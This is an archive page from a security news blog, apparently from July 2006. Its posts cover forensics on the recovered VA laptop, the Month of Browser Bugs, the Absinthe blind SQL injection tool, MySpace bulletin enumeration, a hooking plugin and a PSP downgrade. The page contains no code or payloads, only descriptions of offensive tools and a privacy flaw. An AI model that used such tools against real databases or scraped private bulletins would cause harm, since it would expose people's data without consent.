Archive | July, 2006

A Forensic Analysis of the Lost Veteran’s Administration Laptop

Outsmart Malicious Hackers


An interesting speculative post on the forensics techniques that would most likely be used by the FBI during the investigation of the recovered Veteran’s Administration laptop.

Most of them are pretty straight forwards if you have any kind of experience with digital forensics and data recovery (disaster recovery, incident response etc.)

As a former Computer Forensic Specialist, I wanted to explain what’s probably going on with this laptop now that the FBI has the system and is forensically examining it. This explanation assumes the data was present on the hard drive (not a CD-Rom or other storage medium).

The two main areas cover physical examination and digital examination, physical would be looking for fingerprints and looking for evidence of tampering (screw heads, case scratches etc.).

A little discussion on MAC times and so on, if anyone is interested in this area, I might elaborate later.

As I said in the previous article, there isn’t much they can do if someone knew what they were doing.

The laptop thieves really know what they are doing. They remove the hard drive from the laptop, and mount it read-only (no modifications to the file system) on another computer, access the sensitive data and re-insert the hard drive into the stolen laptop. This is the same process the forensic examiner would use to prevent the examination from modifying the data contained on the laptop — and this is why I mentioned what the FBI might look for during the physical examination — marks on the screws or finger prints on the internal hard drive casing.

Indeed.

Source: Zonelabs


Posted in: Countermeasures, Forensics, General News

Tags: , , , , , , ,

Posted in: Countermeasures, Forensics, General News | Add a Comment
Recent in Countermeasures:
- Why Are Hackers Winning The Security Game?
- Barnyard2 – Dedicated Spooler for Snort Output
- Wycheproof – Test Crypto Libraries Against Known Attacks

Related Posts:

Most Read in Countermeasures:
- AJAX: Is your application secure enough? - 120,547 views
- Password Hasher Firefox Extension - 118,100 views
- NDR or Backscatter Spam – How Non Delivery Reports Become a Nuisance - 57,799 views


Darknet – Subscribe by E-mail

Keep on Guard!


If you aren’t using RSS you can now subscribe to Darknet via e-mail, you will receive a daily update of the posts published in the last 24 hours.

Enter your Email




Powered by FeedBlitz

Might be useful if you don’t have frequent access to check the site too.

Cheers!


Posted in: Site News

Tags: , , ,

Posted in: Site News | Add a Comment
Recent in Site News:
- Darknet Moving Servers & Upgrades Etc
- A Look Back At 2015 – Tools & News Highlights
- A Look Back At 2014 – Tools & News Highlights

Related Posts:

Most Read in Site News:
- Welcome to Darknet – The REBIRTH - 36,653 views
- Get the ball rollin’ - 19,009 views
- Slashdot Effect vs Digg Effect Traffic Report - 12,276 views


Veterans Administration Chief Says Laptop Recovered

Outsmart Malicious Hackers


Ah, so finally they got it back, from a street corner of all places.

Let’s hope they shall be a little more careful in the future yah?

The missing laptop and hard drive that contained veterans’ personal information has been found, Veterans Administration Chief Jim Nicholson announced Thursday.

The announcement came at the beginning of a hearing before the House Veterans’ Affairs Committee hearing.

“It was confirmed to me by the deputy attorney general that law enforcement has in their possession the … laptop and hard drive,” Nicholson said in a statement at the hearing. “The serial numbers match.”

Of course the FBI will roll out it’s forensics experts to testify the data has not been accessed, but let’s face it, how hard is it to mount the drive read only and clone it?

Not very right..

Experts were conducting forensic tests on the laptop and hard drive, Nicholson said. It was not immediately clear if the data on the equipment had been copied or compromised, but Nicholson said “there is reason to be optimistic.”

He did not say how the equipment was recovered, on where it’s been during the past two months. The equipment was found Wednesday; Nicholson said he wasn’t aware of any arrests made in connection with the incident.

An FBI spokesman said the laptop computer was recovered “in the area,” but could not provide more specific information. Forensics tests showed “the sensitive files were not accessed,” according to special agent in charge Bill Chase.

We’ll look at the forensics techniques in more depth later.

Source: MSNBC


Posted in: General News, Hardware Hacking

Tags: , , , , , , , , ,

Posted in: General News, Hardware Hacking | Add a Comment
Recent in General News:
- Security Vendor Trustwave Bought By Singtel For $810M
- Teen Accused Of Hacking School To Change Grades
- Google’s Chrome Apps – Are They Worth The Risk?

Related Posts:

Most Read in General News:
- Hacking Still Can’t Outdo Stupidity for Data Leaks - 125,518 views
- eEye Launches 0-Day Exploit Tracker - 86,099 views
- Seattle Computer Security Expert Turns Tables On The Police - 45,279 views


Month of Browser Bugs (MoBB)

Keep on Guard!


Get ready for a complete month of fun with H D Moore’s Month of Browser Bugs.

Quoting from Browser Fun blog:

This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!

He say’s he has plenty of vulnerabilities to go around.

You can also read his post at Metasploit’s blog.


Posted in: Exploits/Vulnerabilities

Tags: , , , ,

Posted in: Exploits/Vulnerabilities | Add a Comment
Recent in Exploits/Vulnerabilities:
- Kadimus – LFI Scanner & Exploitation Tool
- LastPass Leaking Passwords Via Chrome Extension
- Ubiquiti Wi-Fi Gear Hackable Via 1997 PHP Version

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 237,545 views
- AJAX: Is your application secure enough? - 120,547 views
- eEye Launches 0-Day Exploit Tracker - 86,099 views


Absinthe Blind SQL Injection Tool/Software

Keep on Guard!


Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.

Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.

Features:


  • Automated SQL Injection
  • Supports MS SQL Server, MSDE, Oracle, Postgres
  • Cookies / Additional HTTP Headers
  • Query Termination
  • Additional text appended to queries
  • Supports Use of Proxies / Proxy Rotation
  • Multiple filters for page profiling
  • Custom Delimiters

More Information here:

Absinthe (Documentation)


Posted in: Database Hacking, Hacking Tools, Web Hacking

Tags: , , , , , , ,

Posted in: Database Hacking, Hacking Tools, Web Hacking | Add a Comment
Recent in Database Hacking:
- Another MongoDB Hack Leaks Two Million Recordings Of Kids
- MongoDB Ransack – Over 33,000 Databases Hacked
- DBShield – Go Based Database Firewall

Related Posts:

Most Read in Database Hacking:
- Pangolin – Automatic SQL Injection Tool - 78,483 views
- bsqlbf 1.1 – Blind SQL Injection Tool - 54,773 views
- SQLBrute – SQL Injection Brute Force Tool - 42,412 views


Data Mining MySpace Bulletins

Outsmart Malicious Hackers


An interesting find made by John Hackenger surfaced today. For those of you familiar with MySpace, you’ll know that it uses ‘Bulletins’ to send a single message to multiple friends in your list.

Because the message is sent only to the people you have authorized to be on your list, sometimes you get a feel of safety that will make you post information that otherwise you would not want available on the Internet.

What if this information wasn’t private and could be available to everyone?

Because the messages are numeric and sequential at the URL, you can easily get information out of those bulletins.

John Hackenger explains his finding with a complete post of the information.

As you can see, he coded a little application in C to make the whole process simpler – needs some work with the syntax errors.


Posted in: Privacy, Web Hacking

Tags: , , , , ,

Posted in: Privacy, Web Hacking | Add a Comment
Recent in Privacy:
- Visiting The States? Have Your Passwords Ready
- ONIOFF – Onion URL Inspector
- Dark Web Paying Corporate Workers To Leak Info

Related Posts:

Most Read in Privacy:
- Browse Anonymously at Work or School – Bypass Firewall & Proxy - 180,865 views
- Hacking Still Can’t Outdo Stupidity for Data Leaks - 125,518 views
- Anonymous Connections Over the Internet – Using Socks Chains Proxy Proxies - 123,213 views


Universal Hooker – An Ollydbg Plugin

Outsmart Malicious Hackers


The Universal Hooker is a tool to intercept execution of programs. It enables the
user to intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory.

Why is it ‘Universal’? There are different ways of hooking functions in a program, for example, it can be done by setting software breakpoints (int 3h), hardware breakpoints (cpu regs), or overwriting the prologue of a function to jump to a ‘stub’, etc. All the methods mentioned above, specially the latter, usually require the programmer of the code creating the hook to have certain knowledge of the function it is intercepting. If the code is written in a programming language like C/C++, the code will normally need to be recompiled for every function one wants to intercept, etc.

The Universal Hooker tries to create very simple abstractions that allow a user of the tool to write hooks for different API and non-API functions using an interpreted language (python), without the need to compile anything, and with the possibility of changing the code that gets executed when the hooked function is called in run-time.

The Universal Hooker builds on the idea that the function handling the hook is the one with the knowledge about the parameters type of the function it is handling. The Universal Hooker only knows the number of parameters of the function, and obtains them from the stack (all DWORDS). The hook handler is the one that will interpret those DWORDS as the types received by the function.

The hook handlers are written in python, what eliminates the need for recompiling the handlers when a modification is required. And also, the hook handlers (executed by the server) are reloaded from disk every time a hook handler is called, this means that one can change the behavior of the hook handler without the need to recompile the code, or having to restart the application being analyzed.

What can you do with it?

  • Fuzz in runtime without implementing protocol, just modify the packets
  • Interactive fuzzing using an hex editor
  • Poor’s man http/https proxy
  • Many things, check out the documentation

You can download it here:

Universal Hooker (Documentation)


Posted in: Hacking Tools

Tags: , , , , , , , ,

Posted in: Hacking Tools | Add a Comment
Recent in Hacking Tools:
- Kadimus – LFI Scanner & Exploitation Tool
- SessionGopher – Session Extraction Tool
- Powerfuzzer – Automated Customizable Web Fuzzer

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 2,015,105 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,569,252 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 700,482 views


Downgrade PSP v2.6 to v1.5 to play homebrew & ISO games

Outsmart Malicious Hackers


Dark_AleX has now shared Downgrader Test v0.5 For PSP 2.50/2.60 Firmware which, according to MANY users (including TGMG, LalaMan, Firey, and LAXitives), works 100% with PSP consoles that were upgraded to v2.50 or v2.60 Firmware. However, it will NOT work with TA-082 versions and it’s NOT recommended for users whose FACTORY/STOCK Firmware was 2.50 or 2.60.


Check out the video in action here. Unfortunately the video quality is crap but its proof that it works. This hack was just released yesterday. So to those who have upgaded their PSP to v2.6, you still can downgrade to v1.5 to be able to play homebrew games and also ISO games.

Use this to check if you have TA-082 before you continue.


Posted in: General Hacking

Tags: ,

Posted in: General Hacking | Add a Comment
Recent in General Hacking:
- The Dyn DNS DDoS That Killed Half The Internet
- Fully Integrated Defense Operation (FIDO) – Automated Incident Response
- BADLOCK – Are ‘Branded’ Exploits Going Too Far?

Related Posts:

Most Read in General Hacking:
- 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) - 1,176,598 views
- Hack Tools/Exploits - 639,562 views
- Password Cracking with Rainbowcrack and Rainbow Tables - 442,062 views